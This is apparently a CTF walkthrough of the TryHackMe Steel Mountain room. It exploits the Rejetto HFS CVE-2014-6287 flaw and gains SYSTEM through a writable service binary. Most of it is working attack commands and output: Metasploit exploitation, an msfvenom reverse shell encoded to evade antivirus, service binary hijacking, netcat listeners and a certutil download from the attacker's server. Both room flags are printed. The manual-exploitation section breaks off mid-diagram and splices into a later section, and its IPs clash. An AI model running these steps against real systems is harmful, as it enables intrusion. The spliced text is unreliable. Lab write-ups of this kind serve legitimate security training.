Share
## https://sploitus.com/exploit?id=12B6BD71-7667-5A58-AF52-B59089630526
[![BobXploit Cybersecurity](https://img.shields.io/badge/BobXploit-Cybersecurity-21262d?style=for-the-badge&labelColor=21262d)](https://github.com/bobxploit)



![TryHackMe](https://img.shields.io/badge/TryHackMe-21262d?style=flat-square&logo=tryhackme&logoColor=f85149)
![Nmap](https://img.shields.io/badge/Nmap-21262d?style=flat-square&logo=nmap&logoColor=388bfd)
![Metasploit](https://img.shields.io/badge/Metasploit-21262d?style=flat-square&logo=metasploit&logoColor=f85149)
![PowerShell](https://img.shields.io/badge/PowerShell-21262d?style=flat-square&logo=powershell&logoColor=388bfd)
![Python](https://img.shields.io/badge/Python-21262d?style=flat-square&logo=python&logoColor=e3b341)
![winPEAS](https://img.shields.io/badge/winPEAS-21262d?style=flat-square&logo=github&logoColor=f0883e)
![GitHub](https://img.shields.io/badge/GitHub-21262d?style=flat-square&logo=github&logoColor=3fb950)



# Steel Mountain TryHackMe Walkthrough
## Windows Privilege Escalation & HFS RCE







---

## ๐Ÿ“‹ Table of Contents

- [Executive Summary](#executive-summary)
- [Room Overview](#room-overview)
- [Tools Used](#tools-used)
- [Reconnaissance & Enumeration](#reconnaissance--enumeration)
- [Identifying the Vulnerability](#identifying-the-vulnerability)
- [Initial Access with Metasploit](#initial-access-with-metasploit)
- [User Flag](#user-flag)
- [Privilege Escalation with PowerUp](#privilege-escalation-with-powerup)
- [Exploiting the Service Misconfiguration](#exploiting-the-service-misconfiguration)
- [SYSTEM Shell & Root Flag](#system-shell--root-flag)
- [Manual Exploitation Without Metasploit](#manual-exploitation-without-metasploit)
- [winPEAS Enumeration](#winpeas-enumeration)
- [Lessons Learned](#lessons-learned)
- [References](#references)

---

## Executive Summary

| Field | Detail |
|---|---|
| **Target IP** | `10.114.185.20` |
| **Operating System** | Windows Server 2012 R2 (6.3 Build 9600) |
| **Architecture** | x64 |
| **Key Vulnerability** | CVE-2014-6287 โ€” Rejetto HFS Remote Code Execution |
| **Exploit Module** | `exploit/windows/http/rejetto_hfs_exec` |
| **Vulnerable Port** | `8080` (HTTP File Server 2.3) |
| **Privilege Escalation** | AdvancedSystemCareService9 โ€” Writable Service Binary |
| **User Flag** | `b04763b6fcf51fcd7c13abc7db4fd365` |
| **Root Flag** | `9af5f314f57607c00fd09803a587db80` |

---

## Room Overview

> Steel Mountain is a Windows-based TryHackMe room inspired by the fictional *Steel Mountain* data facility from the TV show **Mr. Robot**. The room simulates a realistic corporate environment running a vulnerable HTTP File Server exposed on a non-standard port.

This walkthrough covers **two complete attack paths**:

- **Path A** โ€” Full exploitation using Metasploit
- **Path B** โ€” Complete manual exploitation without Metasploit (OSCP-style)

---

## Tools Used

| Tool | Purpose |
|---|---|
| ![Nmap](https://img.shields.io/badge/Nmap-blue?logo=nmap&logoColor=white) | Port scanning & service enumeration |
| ![Metasploit](https://img.shields.io/badge/Metasploit-red?logo=metasploit&logoColor=white) | CVE-2014-6287 exploitation |
| `msfvenom` | Malicious payload generation |
| `PowerUp.ps1` | Windows privilege escalation enumeration |
| `winPEAS` | Automated Windows enumeration |
| `netcat` | Reverse shell listener |
| `certutil` | Native Windows file downloader |
| `python3` | Manual exploit execution & HTTP server |

---

## Reconnaissance & Enumeration

Before touching any exploit, we map the full attack surface using Nmap with version detection, default scripts, vulnerability scanning, and OS fingerprinting.

```bash
nmap 10.114.185.20 -sV -sC --script=vuln -O -Pn
```

**Flag breakdown:**

| Flag | Purpose |
|---|---|
| `-sV` | Detect service versions |
| `-sC` | Run default Nmap scripts |
| `--script=vuln` | Run vulnerability detection scripts |
| `-O` | OS fingerprinting |
| `-Pn` | Skip host discovery (treat host as up) |

**Key findings from the scan:**

```
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 8.5
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows Server 2012 R2
3389/tcp  open  ssl/ms-wbt-server
8080/tcp  open  http               HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

> [!IMPORTANT]
> **Critical finding:** Port `8080` is running **Rejetto HTTP File Server 2.3** โ€” a version publicly known to be vulnerable to **CVE-2014-6287** (unauthenticated Remote Code Execution).

---

## Identifying the Vulnerability

**CVE-2014-6287** is a critical Remote Code Execution vulnerability in Rejetto HTTP File Server versions 2.3.x.

| Field | Detail |
|---|---|
| **CVE** | CVE-2014-6287 |
| **CVSS Score** | 7.5 (High) |
| **Affected Versions** | HFS 2.3, 2.3a, 2.3b |
| **Authentication Required** | โŒ None |
| **Attack Vector** | Network |

**Root cause:** The `findMacroMarker` function fails to properly sanitize null bytes (`%00`) in URL search parameters. By sending a crafted request containing a null byte followed by HFS template macros (e.g., `{.exec|.}`), an attacker can execute arbitrary OS commands on the server โ€” without any authentication.

> [!WARNING]
> **Impact:** Any attacker with network access to port 8080 can execute arbitrary commands as the HFS service account โ€” no credentials required.

---

## Initial Access with Metasploit

Metasploit contains a ready exploit module for CVE-2014-6287. Launch Metasploit:

```bash
msfconsole
```

Search for and select the exploit module:

```bash
msf6 > use exploit/windows/http/rejetto_hfs_exec
```

Configure the required parameters:

```bash
msf6 exploit(windows/http/rejetto_hfs_exec) > set LHOST 
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOST 10.114.185.20
msf6 exploit(windows/http/rejetto_hfs_exec) > set RPORT 8080
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
```

**Exploit output:**

```
[*] Started reverse TCP handler on 10.114.66.80:4444
[*] Using URL: http://10.114.66.80:8080/rgHFMeTw
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /rgHFMeTw
[*] Sending stage (177734 bytes) to 10.114.185.20
[!] Tried to delete %TEMP%\zHbprOZvQjZrPH.vbs, unknown result
[*] Meterpreter session 1 opened (10.114.66.80:4444 ->
10.114.185.20:49890) at 2026-05-15 01:26:33 +0100
[*] Server stopped.
```

Verify system information from the Meterpreter prompt:

```bash
meterpreter > sysinfo
```

```
Computer        : STEELMOUNTAIN
OS              : Windows Server 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
```

> [!NOTE]
> We are running a 32-bit (x86) Meterpreter on a 64-bit system as a low-privileged user. The next step is to capture the user flag and then escalate to SYSTEM.

---

## User Flag

Search the filesystem for the user flag:

```bash
meterpreter > search -f user.txt
```

```
Found 1 result...
    c:\Users\bill\Desktop\user.txt (70 bytes)
```

Read the file:

```bash
meterpreter > cat "c:\Users\bill\Desktop\user.txt"
```

```
b04763b6fcf51fcd7c13abc7db4fd365
```

> ๐Ÿ **User Flag:** `b04763b6fcf51fcd7c13abc7db4fd365`

---

## Privilege Escalation with PowerUp

With our initial foothold as `bill`, the next objective is escalating to **SYSTEM**. We use **PowerUp.ps1** from the [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) framework โ€” a script that automates detection of common Windows privilege escalation vectors:

- Unquoted service paths
- Writable service binaries
- Weak service ACLs (Access Control Lists)
- AlwaysInstallElevated registry misconfigurations
- Modifiable service registry keys

### Download PowerUp.ps1

```bash
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
```

### Upload to the Target

```bash
meterpreter > upload /root/Desktop/PowerUp.ps1
```

### Load PowerShell & Execute

```bash
meterpreter > load powershell
meterpreter > powershell_shell
```

```powershell
PS > . ./PowerUp.ps1
PS > Invoke-AllChecks
```

### PowerUp Output โ€” Critical Finding

```
ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : C:\Program Files (x86)\IObit\Advanced SystemCare\
CanRestart     : True
StartName      : LocalSystem
Check          : Unquoted Service Paths
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path 
```

> [!IMPORTANT]
> **Critical finding:** `AdvancedSystemCareService9` runs as **LocalSystem** (maximum Windows privilege), its binary directory is **writable**, and our user `bill` can **restart the service**. This is a perfect binary hijacking vector.

---

## Exploiting the Service Misconfiguration

### Attack Plan

```
[bill] โ†’ Replace ASCService.exe โ†’ Restart Service โ†’ [SYSTEM Shell]
```

### Step 1 โ€” Generate a Malicious Payload

On the attacker machine, use `msfvenom` to craft a Windows reverse shell service executable:

```bash
msfvenom -p windows/shell_reverse_tcp \
  LHOST=10.114.66.80 \
  LPORT=4443 \
  -e x86/shikata_ga_nai \
  -f exe-service \
  -o ASCService.exe
```

| Flag | Description |
|---|---|
| `-p windows/shell_reverse_tcp` | Standard Windows TCP reverse shell |
| `LHOST` / `LPORT` | Attacker IP and listener port |
| `-e x86/shikata_ga_nai` | Polymorphic encoder for basic AV bypass |
| `-f exe-service` | Output as a Windows service executable |
| `-o ASCService.exe` | Filename matching the legitimate binary |

### Step 2 โ€” Set Up the Listener

```bash
msfconsole -q -x "use exploit/multi/handler; \
  set PAYLOAD windows/shell_reverse_tcp; \
  set LHOST 10.114.66.80; \
  set LPORT 4443; \
  exploit"
```

### Step 3 โ€” Upload the Payload

```bash
meterpreter > upload ASCService.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
```

### Step 4 โ€” Stop, Replace & Restart the Service

Stop the running service:

```powershell
sc stop AdvancedSystemCareService9
```

Copy the malicious payload to overwrite the legitimate binary:

```powershell
Copy-Item -Path "C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASCService.exe" `
          -Destination "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe" `
          -Force
```

Restart the service to trigger code execution as SYSTEM:

```powershell
sc start AdvancedSystemCareService9
```

---

## SYSTEM Shell & Root Flag

The moment the service starts, Windows executes our payload as **LocalSystem**. The listener catches the reverse shell:

```
Connection from 10.114.185.20 received!
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
```

Verify privileges:

```cmd
whoami
```

```
nt authority\system
```

Locate and capture the root flag:

```cmd
where /r C:\ root.txt
```

```cmd
type C:\Users\Administrator\Desktop\root.txt
```

```
9af5f314f57607c00fd09803a587db80
```

> ๐Ÿ† **Root Flag:** `9af5f314f57607c00fd09803a587db80`

---

## Manual Exploitation Without Metasploit

> [!NOTE]
> This section covers the **full attack chain without Metasploit** โ€” required for OSCP exam conditions and real-world engagements where automated frameworks are restricted.

### Step 1 โ€” Get the Python Exploit

```bash
searchsploit rejetto
searchsploit -m 39161.py
```

Edit the exploit configuration variables:

```python
ip_addr   = "10.112.125.29"   # Your TryHackMe VPN IP
local_port = "443"             # Listener port
```

### Step 2 โ€” Set Up the Netcat Listener

```bash
nc -lnvp 443
```

### Step 3 โ€” Download Static Ncat Binary

The exploit uses `certutil` to pull `ncat.exe` from our HTTP server to the target:

```bash
wget https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe
```

### Step 4 โ€” Host Files via Python HTTP Server

```bash
python3 -m http.server 80
```

### Step 5 โ€” Execute the Exploit

```bash
python3 CVE-2014-6287.py 10.13.12.138 8080
```

**What happens internally:**

```
Attacker                         HFS Server (Target)
   |                                     |
   |-- Sends crafted HTTP request ------>|
   |                                     |-- Executes: certutil -urlcache -f
   | [!WARNING]
> winPEAS independently confirms the `AdvancedSystemCareService9` directory is **writable by Everyone** and the service runs as **LocalSystem**. This matches the PowerUp finding โ€” two independent tools confirming the same vector.

---

## Lessons Learned

### ๐Ÿ›ก๏ธ For Defenders

| Finding | Recommendation |
|---|---|
| HFS 2.3 exposed on port 8080 | Patch immediately. CVE-2014-6287 was fixed in 2014. Implement continuous vulnerability management. |
| Service running as LocalSystem | Apply **Least Privilege**. Services rarely need SYSTEM rights. Use dedicated low-privilege accounts. |
| Service directory writable by Everyone | Audit and restrict ACLs on all service binary directories. Use `icacls` or `AccessChk` regularly. |
| HFS reachable from network | Implement **network segmentation**. Internal services must not be reachable from untrusted segments. |
| No FIM in place | Deploy **File Integrity Monitoring** on service binary directories. Binary replacement is immediately detectable. |

### โš”๏ธ For Red Teamers

- **Enumerate all ports** โ€” the critical service was on `8080`, not the obvious port `80`
- **Use both PowerUp and winPEAS** โ€” they're complementary and confirm each other's findings
- **`certutil` is your friend** โ€” reliable native Windows downloader, no extra tools needed on target
- **Master manual exploitation** โ€” Metasploit is a shortcut, not a crutch. The manual path is essential for OSCP

---

## References

| Resource | Link |
|---|---|
| TryHackMe Room | [Steel Mountain](https://tryhackme.com/room/steelmountain) |
| Rapid7 Module | [exploit/windows/http/rejetto_hfs_exec](https://www.rapid7.com/db/modules/exploit/windows/http/rejetto_hfs_exec/) |
| Exploit-DB | [CVE-2014-6287 โ€” EDB-39161](https://www.exploit-db.com/exploits/39161) |
| NVD | [CVE-2014-6287](https://nvd.nist.gov/vuln/detail/CVE-2014-6287) |
| PowerSploit | [PowerUp.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) |
| PEASS-ng | [winPEAS](https://github.com/carlospolop/PEASS-ng) |
| Static Binaries | [ncat.exe](https://github.com/andrew-d/static-binaries) |

---



**Written by [BobXploit](https://github.com/bobxploit)**
*Penetration tester & cybersecurity researcher*

[![GitHub](https://img.shields.io/badge/GitHub-BobXploit-black?style=flat-square&logo=github)](https://github.com/bobxploit)
[![TryHackMe](https://img.shields.io/badge/TryHackMe-Profile-red?style=flat-square&logo=tryhackme)](https://tryhackme.com)

*Follow for more TryHackMe walkthroughs, CTF write-ups, and offensive security content.*